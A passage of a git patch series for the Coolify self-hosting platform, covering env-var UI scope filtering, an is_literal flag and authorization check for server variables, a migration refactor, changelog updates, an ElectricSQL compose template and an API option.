CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBjdXJsCiAgICAgICAgLSAnLWYnCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTo4MDg4L2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxOCcKICAgIGVudmlyb25tZW50OgogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotc3VwZXJzZXQtZGJ9JwogICAgdm9sdW1lczoKICAgICAgLSAnc3VwZXJzZXRfcG9zdGdyZXNfZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo4JwogICAgdm9sdW1lczoKICAgICAgLSAnc3VwZXJzZXRfcmVkaXNfZGF0YTovZGF0YScKICAgIGNvbW1hbmQ6ICdyZWRpcy1zZXJ2ZXIgLS1yZXF1aXJlcGFzcyAke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICdyZWRpcy1jbGkgcGluZycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "analytics",
             "bi",

From 99d22ae7d68b0fde62bfcc78b7693287ec744d22 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 2 Jan 2026 17:31:00 +0100
Subject: [PATCH 007/213] fix: filter available scopes based on existing
 variables in env var input

---
 .../views/components/forms/env-var-input.blade.php | 14 +++++++++++++-
 .../shared/environment-variable/show.blade.php     |  6 +++---
 2 files changed, 16 insertions(+), 4 deletions(-)

diff --git a/resources/views/components/forms/env-var-input.blade.php b/resources/views/components/forms/env-var-input.blade.php
index dde535f19..61e308a83 100644
--- a/resources/views/components/forms/env-var-input.blade.php
+++ b/resources/views/components/forms/env-var-input.blade.php
@@ -17,8 +17,15 @@
             selectedIndex: 0,
             cursorPosition: 0,
             currentScope: null,
-            availableScopes: ['team', 'project', 'environment', 'server'],
             availableVars: @js($availableVars),
+            get availableScopes() {
+                // Only include scopes that have at least one variable
+                const allScopes = ['team', 'project', 'environment', 'server'];
+                return allScopes.filter(scope => {
+                    const vars = this.availableVars[scope];
+                    return vars && vars.length > 0;
+                });
+            },
             scopeUrls: @js($scopeUrls),
 
             handleInput() {
@@ -54,6 +61,11 @@
 
                 if (content === '') {
                     this.currentScope = null;
+                    // Only show dropdown if there are available scopes with variables
+                    if (this.availableScopes.length === 0) {
+                        this.showDropdown = false;
+                        return;
+                    }
                     this.suggestions = this.availableScopes.map(scope => ({
                         type: 'scope',
                         value: scope,
diff --git a/resources/views/livewire/project/shared/environment-variable/show.blade.php b/resources/views/livewire/project/shared/environment-variable/show.blade.php
index d2195c2af..4dc46bbbb 100644
--- a/resources/views/livewire/project/shared/environment-variable/show.blade.php
+++ b/resources/views/livewire/project/shared/environment-variable/show.blade.php
@@ -109,7 +109,7 @@
                             disabled
                             type="password"
                             id="value"
-                            :availableVars="$this->availableSharedVariables"
+                            :availableVars="$isSharedVariable ? [] : $this->availableSharedVariables"
                             :projectUuid="data_get($parameters, 'project_uuid')"
                             :environmentUuid="data_get($parameters, 'environment_uuid')"
                             :serverUuid="data_get($parameters, 'server_uuid')" />
@@ -128,7 +128,7 @@
                                 :required="$is_redis_credential"
                                 type="password"
                                 id="value"
-                                :availableVars="$this->availableSharedVariables"
+                                :availableVars="$isSharedVariable ? [] : $this->availableSharedVariables"
                                 :projectUuid="data_get($parameters, 'project_uuid')"
                                 :environmentUuid="data_get($parameters, 'environment_uuid')"
                                 :serverUuid="data_get($parameters, 'server_uuid')" />
@@ -145,7 +145,7 @@
                         disabled
                         type="password"
                         id="value"
-                        :availableVars="$this->availableSharedVariables"
+                        :availableVars="$isSharedVariable ? [] : $this->availableSharedVariables"
                         :projectUuid="data_get($parameters, 'project_uuid')"
                         :environmentUuid="data_get($parameters, 'environment_uuid')"
                         :serverUuid="data_get($parameters, 'server_uuid')" />

From 510fb2256bc88f625c26e2602943cc23578e07d2 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 2 Jan 2026 17:46:39 +0100
Subject: [PATCH 008/213] fix: add 'is_literal' flag to shared environment
 variables for servers

---
 app/Models/Server.php                                       | 5 +++--
 ..._add_predefined_server_variables_to_existing_servers.php | 6 ++++--
 database/seeders/SharedEnvironmentVariableSeeder.php        | 2 ++
 3 files changed, 9 insertions(+), 4 deletions(-)

diff --git a/app/Models/Server.php b/app/Models/Server.php
index 46587e7bc..bb75a414b 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -19,7 +19,6 @@
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Builder;
 use Illuminate\Database\Eloquent\Casts\Attribute;
-use Illuminate\Database\Eloquent\Relations\HasMany;
 use Illuminate\Database\Eloquent\Factories\HasFactory;
 use Illuminate\Database\Eloquent\SoftDeletes;
 use Illuminate\Support\Carbon;
@@ -169,7 +168,7 @@ protected static function booted()
                     $standaloneDocker->saveQuietly();
                 }
             }
-             if (! isset($server->proxy->redirect_enabled)) {
+            if (! isset($server->proxy->redirect_enabled)) {
                 $server->proxy->redirect_enabled = true;
             }
 
@@ -180,6 +179,7 @@ protected static function booted()
                 'type' => 'server',
                 'server_id' => $server->id,
                 'team_id' => $server->team_id,
+                'is_literal' => true,
             ]);
             SharedEnvironmentVariable::create([
                 'key' => 'COOLIFY_SERVER_NAME',
@@ -187,6 +187,7 @@ protected static function booted()
                 'type' => 'server',
                 'server_id' => $server->id,
                 'team_id' => $server->team_id,
+                'is_literal' => true,
             ]);
         });
         static::retrieved(function ($server) {
diff --git a/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php b/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php
index d31b57ca7..3d09197b4 100644
--- a/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php
+++ b/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php
@@ -21,13 +21,14 @@ public function up(): void
                 ->where('key', 'COOLIFY_SERVER_UUID')
                 ->exists();
 
-            if (!$uuidExists) {
+            if (! $uuidExists) {
                 DB::table('shared_environment_variables')->insert([
                     'key' => 'COOLIFY_SERVER_UUID',
                     'value' => $server->uuid,
                     'type' => 'server',
                     'server_id' => $server->id,
                     'team_id' => $server->team_id,
+                    'is_literal' => true,
                     'created_at' => now(),
                     'updated_at' => now(),
                 ]);
@@ -40,13 +41,14 @@ public function up(): void
                 ->where('key', 'COOLIFY_SERVER_NAME')
                 ->exists();
 
-            if (!$nameExists) {
+            if (! $nameExists) {
                 DB::table('shared_environment_variables')->insert([
                     'key' => 'COOLIFY_SERVER_NAME',
                     'value' => $server->name,
                     'type' => 'server',
                     'server_id' => $server->id,
                     'team_id' => $server->team_id,
+                    'is_literal' => true,
                     'created_at' => now(),
                     'updated_at' => now(),
                 ]);
diff --git a/database/seeders/SharedEnvironmentVariableSeeder.php b/database/seeders/SharedEnvironmentVariableSeeder.php
index b55d13a17..7a17fbd10 100644
--- a/database/seeders/SharedEnvironmentVariableSeeder.php
+++ b/database/seeders/SharedEnvironmentVariableSeeder.php
@@ -44,6 +44,7 @@ public function run(): void
                 'team_id' => $server->team_id,
             ], [
                 'value' => $server->uuid,
+                'is_literal' => true,
             ]);
 
             SharedEnvironmentVariable::firstOrCreate([
@@ -53,6 +54,7 @@ public function run(): void
                 'team_id' => $server->team_id,
             ], [
                 'value' => $server->name,
+                'is_literal' => true,
             ]);
         }
     }

From 9cd8dff5bf5092d6b9826f9b7a5baf9337454c84 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 2 Jan 2026 17:46:44 +0100
Subject: [PATCH 009/213] fix: remove redundant sort call in environment
 variables display

---
 resources/views/livewire/shared-variables/server/show.blade.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/resources/views/livewire/shared-variables/server/show.blade.php b/resources/views/livewire/shared-variables/server/show.blade.php
index cddde9c76..c39b647fa 100644
--- a/resources/views/livewire/shared-variables/server/show.blade.php
+++ b/resources/views/livewire/shared-variables/server/show.blade.php
@@ -19,7 +19,7 @@
     </div>
     @if ($view === 'normal')
         <div class="flex flex-col gap-2">
-            @forelse ($server->environment_variables->whereNotIn('key', ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])->sort()->sortBy('key') as $env)
+            @forelse ($server->environment_variables->whereNotIn('key', ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])->sortBy('key') as $env)
                 <livewire:project.shared.environment-variable.show wire:key="environment-{{ $env->id }}"
                     :env="$env" type="server" />
             @empty

From 5661c136f57502957eb284c47fea40e3c51d837c Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 2 Jan 2026 19:51:09 +0100
Subject: [PATCH 010/213] fix: ensure authorization check for server view in
 mount method

---
 app/Livewire/SharedVariables/Server/Show.php | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/app/Livewire/SharedVariables/Server/Show.php b/app/Livewire/SharedVariables/Server/Show.php
index 1dd9f9d46..6078ef36f 100644
--- a/app/Livewire/SharedVariables/Server/Show.php
+++ b/app/Livewire/SharedVariables/Server/Show.php
@@ -52,9 +52,10 @@ public function mount()
         $serverUuid = request()->route('server_uuid');
         $teamId = currentTeam()->id;
         $server = Server::where('team_id', $teamId)->where('uuid', $serverUuid)->first();
-        if (!$server) {
+        if (! $server) {
             return redirect()->route('dashboard');
         }
+        $this->authorize('view', $server);
         $this->server = $server;
         $this->getDevView();
     }
@@ -180,4 +181,4 @@ public function render()
     {
         return view('livewire.shared-variables.server.show');
     }
-}
\ No newline at end of file
+}

From 54c28710d9b1ebfd93a334fb97fe79674a9e6683 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Fri, 2 Jan 2026 19:51:16 +0100
Subject: [PATCH 011/213] fix: streamline migration for adding predefined
 server variables to existing servers

---
 ...d_server_variables_to_existing_servers.php | 76 ++++++++-----------
 1 file changed, 31 insertions(+), 45 deletions(-)

diff --git a/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php b/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php
index 3d09197b4..c67987e67 100644
--- a/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php
+++ b/database/migrations/2025_12_24_133707_add_predefined_server_variables_to_existing_servers.php
@@ -1,7 +1,8 @@
 <?php
 
+use App\Models\Server;
+use App\Models\SharedEnvironmentVariable;
 use Illuminate\Database\Migrations\Migration;
-use Illuminate\Support\Facades\DB;
 
 return new class extends Migration
 {
@@ -10,50 +11,37 @@
      */
     public function up(): void
     {
-        // Add predefined server variables to all existing servers
-        $servers = DB::table('servers')->get();
+        Server::query()->chunk(100, function ($servers) {
+            foreach ($servers as $server) {
+                $existingKeys = SharedEnvironmentVariable::where('type', 'server')
+                    ->where('server_id', $server->id)
+                    ->whereIn('key', ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])
+                    ->pluck('key')
+                    ->toArray();
 
-        foreach ($servers as $server) {
-            // Check if COOLIFY_SERVER_UUID already exists
-            $uuidExists = DB::table('shared_environment_variables')
-                ->where('type', 'server')
-                ->where('server_id', $server->id)
-                ->where('key', 'COOLIFY_SERVER_UUID')
-                ->exists();
+                if (! in_array('COOLIFY_SERVER_UUID', $existingKeys)) {
+                    SharedEnvironmentVariable::create([
+                        'key' => 'COOLIFY_SERVER_UUID',
+                        'value' => $server->uuid,
+                        'type' => 'server',
+                        'server_id' => $server->id,
+                        'team_id' => $server->team_id,
+                        'is_literal' => true,
+                    ]);
+                }
 
-            if (! $uuidExists) {
-                DB::table('shared_environment_variables')->insert([
-                    'key' => 'COOLIFY_SERVER_UUID',
-                    'value' => $server->uuid,
-                    'type' => 'server',
-                    'server_id' => $server->id,
-                    'team_id' => $server->team_id,
-                    'is_literal' => true,
-                    'created_at' => now(),
-                    'updated_at' => now(),
-                ]);
+                if (! in_array('COOLIFY_SERVER_NAME', $existingKeys)) {
+                    SharedEnvironmentVariable::create([
+                        'key' => 'COOLIFY_SERVER_NAME',
+                        'value' => $server->name,
+                        'type' => 'server',
+                        'server_id' => $server->id,
+                        'team_id' => $server->team_id,
+                        'is_literal' => true,
+                    ]);
+                }
             }
-
-            // Check if COOLIFY_SERVER_NAME already exists
-            $nameExists = DB::table('shared_environment_variables')
-                ->where('type', 'server')
-                ->where('server_id', $server->id)
-                ->where('key', 'COOLIFY_SERVER_NAME')
-                ->exists();
-
-            if (! $nameExists) {
-                DB::table('shared_environment_variables')->insert([
-                    'key' => 'COOLIFY_SERVER_NAME',
-                    'value' => $server->name,
-                    'type' => 'server',
-                    'server_id' => $server->id,
-                    'team_id' => $server->team_id,
-                    'is_literal' => true,
-                    'created_at' => now(),
-                    'updated_at' => now(),
-                ]);
-            }
-        }
+        });
     }
 
     /**
@@ -61,9 +49,7 @@ public function up(): void
      */
     public function down(): void
     {
-        // Remove predefined server variables
-        DB::table('shared_environment_variables')
-            ->where('type', 'server')
+        SharedEnvironmentVariable::where('type', 'server')
             ->whereIn('key', ['COOLIFY_SERVER_UUID', 'COOLIFY_SERVER_NAME'])
             ->delete();
     }

From 960ceddf1543e162cd5cc24e8b8aa7447dbd889a Mon Sep 17 00:00:00 2001
From: "github-actions[bot]" <github-actions[bot]@users.noreply.github.com>
Date: Sat, 7 Feb 2026 18:52:40 +0000
Subject: [PATCH 012/213] docs: update changelog

---
 CHANGELOG.md | 44 ++++++++++++++++++++++++++++++++++++++------
 1 file changed, 38 insertions(+), 6 deletions(-)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 87e8ae806..76c548627 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1190,7 +1190,16 @@ ### 🚀 Features
 - *(service)* Update autobase to version 2.5 (#7923)
 - *(service)* Add chibisafe template (#5808)
 - *(ui)* Improve sidebar menu items styling (#7928)
-- *(service)* Improve open-archiver
+- *(template)* Add open archiver template (#6593)
+- *(service)* Add linkding template (#6651)
+- *(service)* Add glip template (#7937)
+- *(templates)* Add Sessy docker compose template (#7951)
+- *(api)* Add update urls support to services api
+- *(api)* Improve service urls update
+- *(api)* Add url update support to services api (#7929)
+- *(api)* Improve docker_compose_domains
+- *(api)* Add more allowed fields
+- *(notifications)* Add mattermost notifications (#7963)
 
 ### 🐛 Bug Fixes
 
@@ -3773,6 +3782,7 @@ ### 🐛 Bug Fixes
 - *(scheduling)* Change redis cleanup command frequency from hourly to weekly for better resource management
 - *(versions)* Update coolify version numbers in versions.json and constants.php to 4.0.0-beta.420.5 and 4.0.0-beta.420.6
 - *(database)* Ensure internal port defaults correctly for unsupported database types in StartDatabaseProxy
+- *(git)* Tracking issue due to case sensitivity
 - *(versions)* Update coolify version numbers in versions.json and constants.php to 4.0.0-beta.420.6 and 4.0.0-beta.420.7
 - *(scheduling)* Remove unnecessary padding from scheduled task form layout for improved UI consistency
 - *(horizon)* Update queue configuration to use environment variable for dynamic queue management
@@ -3798,7 +3808,6 @@ ### 🐛 Bug Fixes
 - *(application)* Add option to suppress toast notifications when loading compose file
 - *(git)* Tracking issue due to case sensitivity
 - *(git)* Tracking issue due to case sensitivity
-- *(git)* Tracking issue due to case sensitivity
 - *(ui)* Delete button width on small screens (#6308)
 - *(service)* Matrix entrypoint
 - *(ui)* Add flex-wrap to prevent overflow on small screens (#6307)
@@ -4422,6 +4431,23 @@ ### 🐛 Bug Fixes
 - *(api)* Deprecate applications compose endpoint
 - *(api)* Applications post and patch endpoints
 - *(api)* Applications create and patch endpoints (#7917)
+- *(service)* Sftpgo port
+- *(env)* Only cat .env file in dev
+- *(api)* Encoding checks (#7944)
+- *(env)* Only show nixpacks plan variables section in dev
+- Switch custom labels check to UTF-8
+- *(api)* One click service name and description cannot be set during creation
+- *(ui)* Improve volume mount warning for compose applications (#7947)
+- *(api)* Show an error if the same 2 urls are provided
+- *(preview)* Docker compose preview URLs (#7959)
+- *(api)* Check domain conflicts within the request
+- *(api)* Include docker_compose_domains in domain conflict check
+- *(api)* Is_static and docker network missing
+- *(api)* If domains field is empty clear the fqdn column
+- *(api)* Application endpoint issues part 2 (#7948)
+- Optimize queries and caching for projects and environments
+- *(perf)* Eliminate N+1 queries from InstanceSettings and Server lookups (#7966)
+- Update version numbers to 4.0.0-beta.462 and 4.0.0-beta.463
 
 ### 💼 Other
 
@@ -5510,6 +5536,7 @@ ### 🚜 Refactor
 - Move all env sorting to one place
 - *(api)* Make docker_compose_raw description more clear
 - *(api)* Update application create endpoints docs
+- *(api)* Application urls validation
 
 ### 📚 Documentation
 
@@ -5616,7 +5643,6 @@ ### 📚 Documentation
 - Update changelog
 - *(tests)* Update testing guidelines for unit and feature tests
 - *(sync)* Create AI Instructions Synchronization Guide and update CLAUDE.md references
-- Update changelog
 - *(database-patterns)* Add critical note on mass assignment protection for new columns
 - Clarify cloud-init script compatibility
 - Update changelog
@@ -5647,7 +5673,9 @@ ### 📚 Documentation
 - Update application architecture and database patterns for request-level caching best practices
 - Remove git worktree symlink instructions from CLAUDE.md
 - Remove git worktree symlink instructions from CLAUDE.md (#7908)
-- Update changelog
+- Add transcript lol link and logo to readme (#7331)
+- *(api)* Change domains to urls
+- *(api)* Improve domains API docs
 
 ### ⚡ Performance
 
@@ -6293,10 +6321,10 @@ ### ⚙️ Miscellaneous Tasks
 - *(versions)* Update Coolify versions to 4.0.0-beta.420.2 and 4.0.0-beta.420.3 in multiple files
 - *(versions)* Bump coolify and nightly versions to 4.0.0-beta.420.3 and 4.0.0-beta.420.4 respectively
 - *(versions)* Update coolify and nightly versions to 4.0.0-beta.420.4 and 4.0.0-beta.420.5 respectively
-- *(service)* Update Nitropage template (#6181)
-- *(versions)* Update all version
 - *(bump)* Update composer deps
 - *(version)* Bump Coolify version to 4.0.0-beta.420.6
+- *(service)* Update Nitropage template (#6181)
+- *(versions)* Update all version
 - *(service)* Improve matrix service
 - *(service)* Format runner service
 - *(service)* Improve sequin
@@ -6399,6 +6427,10 @@ ### ⚙️ Miscellaneous Tasks
 - *(services)* Upgrade service template json files
 - *(api)* Update openapi json and yaml
 - *(api)* Regenerate openapi docs
+- Prepare for PR
+- *(api)* Improve current request error message
+- *(api)* Improve current request error message
+- *(api)* Update openapi files
 
 ### ◀️ Revert
 

From 32e1fd97aefe440b03ee1f750761c7e46df87ba8 Mon Sep 17 00:00:00 2001
From: Matteo Gassend <mgassend@gmail.com>
Date: Sat, 7 Feb 2026 20:35:51 +0100
Subject: [PATCH 013/213] feat(templates): add ElectricSQL docker compose
 template

---
 public/svgs/electricsql.svg        |  4 ++++
 templates/compose/electricsql.yaml | 27 +++++++++++++++++++++++++++
 2 files changed, 31 insertions(+)
 create mode 100644 public/svgs/electricsql.svg
 create mode 100644 templates/compose/electricsql.yaml

diff --git a/public/svgs/electricsql.svg b/public/svgs/electricsql.svg
new file mode 100644
index 000000000..bbffe200a
--- /dev/null
+++ b/public/svgs/electricsql.svg
@@ -0,0 +1,4 @@
+<svg width="300" height="260" viewBox="0 0 300 260" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M126.822 31.3968C127.716 30.5005 128.923 30 130.176 30H205.093L98.2708 136.943C97.3776 137.84 96.1702 138.339 94.9168 138.339H20L126.822 31.3968Z" fill="#D0BCFF"/>
+<path d="M113.684 140.714C113.684 139.399 114.752 138.328 116.063 138.328H205.093L113.684 230V140.714Z" fill="#D0BCFF"/>
+</svg>
diff --git a/templates/compose/electricsql.yaml b/templates/compose/electricsql.yaml
new file mode 100644
index 000000000..b1ae2ff96
--- /dev/null
+++ b/templates/compose/electricsql.yaml
@@ -0,0 +1,27 @@
+# documentation: https://electric-sql.com/docs/guides/deployment
+# slogan: Sync shape-based subsets of your Postgres data over HTTP.
+# category: backend
+# tags: electric,electricsql,realtime,sync,postgresql
+# logo: svgs/electricsql.svg
+# port: 3000
+
+## This template intentionally does not deploy PostgreSQL.
+## Set DATABASE_URL to an existing Postgres instance with logical replication enabled.
+## If ELECTRIC_SECRET is set, your own backend/proxy must append it to shape requests.
+
+services:
+  electric:
+    image: electricsql/electric:1.4.2
+    environment:
+      - SERVICE_URL_ELECTRIC_3000
+      - DATABASE_URL=${DATABASE_URL:?}
+      - ELECTRIC_SECRET=${SERVICE_PASSWORD_64_ELECTRIC}
+      - ELECTRIC_STORAGE_DIR=/app/persistent
+      - ELECTRIC_USAGE_REPORTING=${ELECTRIC_USAGE_REPORTING:-false}
+    volumes:
+      - electric_data:/app/persistent
+    healthcheck:
+      test: ["CMD", "curl", "-f", "http://127.0.0.1:3000/v1/health"]
+      interval: 10s
+      timeout: 5s
+      retries: 5

From c180947d6b3664e81927e8d68a85df0caac85c0b Mon Sep 17 00:00:00 2001
From: "github-actions[bot]" <github-actions[bot]@users.noreply.github.com>
Date: Sat, 7 Feb 2026 19:36:24 +0000
Subject: [PATCH 014/213] docs: update changelog

---
 CHANGELOG.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 76c548627..1cc1e0649 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1200,6 +1200,7 @@ ### 🚀 Features
 - *(api)* Improve docker_compose_domains
 - *(api)* Add more allowed fields
 - *(notifications)* Add mattermost notifications (#7963)
+- *(templates)* Add ElectricSQL docker compose template
 
 ### 🐛 Bug Fixes
 
@@ -5676,6 +5677,7 @@ ### 📚 Documentation
 - Add transcript lol link and logo to readme (#7331)
 - *(api)* Change domains to urls
 - *(api)* Improve domains API docs
+- Update changelog
 
 ### ⚡ Performance
 

From 346b2b8bd8f60ebd9db3ad8e0ba9d96a6de318cf Mon Sep 17 00:00:00 2001
From: "github-actions[bot]" <github-actions[bot]@users.noreply.github.com>
Date: Sat, 14 Feb 2026 13:11:23 +0000
Subject: [PATCH 015/213] docs: update changelog

---
 CHANGELOG.md | 73 ++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 73 insertions(+)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 1cc1e0649..223fad638 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1201,6 +1201,30 @@ ### 🚀 Features
 - *(api)* Add more allowed fields
 - *(notifications)* Add mattermost notifications (#7963)
 - *(templates)* Add ElectricSQL docker compose template
+- *(service)* Add back soketi-app-manager
+- *(service)* Upgrade checkmate to v3 (#7995)
+- *(service)* Update pterodactyl version (#7981)
+- *(service)* Add langflow template (#8006)
+- *(service)* Upgrade listmonk to v6
+- *(service)* Add alexandrie template (#8021)
+- *(service)* Upgrade formbricks to v4 (#8022)
+- *(service)* Add goatcounter template (#8029)
+- *(installer)* Add tencentos as a supported os
+- *(installer)* Update nightly install script
+- Update pr template to remove unnecessary quote blocks
+- *(service)* Add satisfactory game server (#8056)
+- *(service)* Disable mautic (#8088)
+- *(service)* Add bento-pdf (#8095)
+- *(ui)* Add official postgres 18 support
+- *(database)* Add official postgres 18 support
+- *(ui)* Use 2 column layout
+- *(database)* Add official postgres 18 and pgvector 18 support (#8143)
+- *(ui)* Improve global search with uuid and pr support (#7901)
+- *(openclaw)* Add Openclaw service with environment variables and health checks
+- *(service)* Disable maybe
+- *(service)* Disable maybe (#8167)
+- *(service)* Add sure
+- *(service)* Add sure (#8157)
 
 ### 🐛 Bug Fixes
 
@@ -4449,6 +4473,41 @@ ### 🐛 Bug Fixes
 - Optimize queries and caching for projects and environments
 - *(perf)* Eliminate N+1 queries from InstanceSettings and Server lookups (#7966)
 - Update version numbers to 4.0.0-beta.462 and 4.0.0-beta.463
+- *(service)* Update seaweedfs logo (#7971)
+- *(service)* Soju svg
+- *(service)* Autobase database is not persisted correctly (#7978)
+- *(ui)* Make tooltips a bit wider
+- *(ui)* Modal issues
+- *(validation)* Add @, / and & support to names and descriptions
+- *(backup)* Postgres restore arithmetic syntax error (#7997)
+- *(service)* Users unable to create their first ente account without SMTP (#7986)
+- *(ui)* Horizontal overflow on application and service headings (#7970)
+- *(service)* Supabase studio settings redirect loop (#7828)
+- *(env)* Skip escaping for valid JSON in environment variables (#6160)
+- *(service)* Disable kong response buffering and increase timeouts (#7864)
+- *(service)* Rocketchat fails to start due to database version incompatibility (#7999)
+- *(service)* N8n v2 with worker timeout error
+- *(service)* Elasticsearch-with-kibana not generating account token
+- *(service)* Elasticsearch-with-kibana not generating account token (#8067)
+- *(service)* Kimai fails to start (#8027)
+- *(service)* Reactive-resume template (#8048)
+- *(api)* Infinite loop with github app with many repos (#8052)
+- *(env)* Skip escaping for valid JSON in environment variables (#8080)
+- *(docker)* Update PostgreSQL version to 16 in Dockerfile
+- *(validation)* Enforce url validation for instance domain (#8078)
+- *(service)* Bluesky pds invite code doesn't generate (#8081)
+- *(service)* Bugsink login fails due to cors (#8083)
+- *(service)* Strapi doesn't start (#8084)
+- *(service)* Activepieces postgres 18 volume mount (#8098)
+- *(service)* Forgejo login failure (#8145)
+- *(database)* Pgvector 18 version is not parsed properly
+- *(labels)* Make sure name is slugified
+- *(parser)* Replace dashes and dots in auto generated envs
+- Stop database proxy when is_public changes to false (#8138)
+- *(docs)* Update documentation link for Openclaw service
+- *(api-docs)* Use proper schema references for environment variable endpoints (#8239)
+- *(ui)* Fix datalist border color and add repository selection watcher (#8240)
+- *(server)* Improve IP uniqueness validation with team-specific error messages
 
 ### 💼 Other
 
@@ -4913,6 +4972,7 @@ ### 💼 Other
 - CVE-2025-55182 React2shell infected supabase/studio:2025.06.02-sha-8f2993d
 - Bump superset to 6.0.0
 - Trim whitespace from domain input in instance settings (#7837)
+- Upgrade postgres client to fix build error
 
 ### 🚜 Refactor
 
@@ -5538,6 +5598,7 @@ ### 🚜 Refactor
 - *(api)* Make docker_compose_raw description more clear
 - *(api)* Update application create endpoints docs
 - *(api)* Application urls validation
+- *(services)* Improve some service slogans
 
 ### 📚 Documentation
 
@@ -5678,6 +5739,10 @@ ### 📚 Documentation
 - *(api)* Change domains to urls
 - *(api)* Improve domains API docs
 - Update changelog
+- Update changelog
+- *(api)* Improve app endpoint deprecation description
+- Add Coolify design system reference
+- Add Coolify design system reference (#8237)
 
 ### ⚡ Performance
 
@@ -6433,6 +6498,14 @@ ### ⚙️ Miscellaneous Tasks
 - *(api)* Improve current request error message
 - *(api)* Improve current request error message
 - *(api)* Update openapi files
+- *(service)* Update service templates json
+- *(services)* Update service template json files
+- *(service)* Use major version for openpanel (#8053)
+- Prepare for PR
+- *(services)* Update service template json files
+- Bump coolify version
+- Prepare for PR
+- Prepare for PR
 
 ### ◀️ Revert
 

From a0077de12cb9e05e6fb7c90ea223abaf329f2684 Mon Sep 17 00:00:00 2001
From: Ahmed <ahmadameer167@gmail.com>
Date: Sun, 15 Feb 2026 22:21:26 +0300
Subject: [PATCH 016/213] feat: add 'is_preserve_repository_enabled' option to
 application controler for PATCH, POST

---
 .../Api/ApplicationsController.php            | 28 ++++++++++++++++---
 1 file changed, 24 insertions(+), 4 deletions(-)

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index 1e045ff5a..bad0adac3 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -226,6 +226,7 @@ public function applications(Request $request)
                             'force_domain_override' => ['type' => 'boolean', 'description' => 'Force domain usage even if conflicts are detected. Default is false.'],
                             'autogenerate_domain' => ['type' => 'boolean', 'default' => true, 'description' => 'If true and domains is empty, auto-generate a domain using the server\'s wildcard domain or sslip.io fallback. Default: true.'],
                             'is_container_label_escape_enabled' => ['type' => 'boolean', 'default' => true, 'description' => 'Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off.'],
+                            'is_preserve_repository_enabled' => ['type' => 'boolean', 'default' => false, 'description' => 'Preserve repository during deployment.'],
                         ],
                     )
                 ),
@@ -391,6 +392,7 @@ public function create_public_application(Request $request)
                             'force_domain_override' => ['type' => 'boolean', 'description' => 'Force domain usage even if conflicts are detected. Default is false.'],
                             'autogenerate_domain' => ['type' => 'boolean', 'default' => true, 'description' => 'If true and domains is empty, auto-generate a domain using the server\'s wildcard domain or sslip.io fallback. Default: true.'],
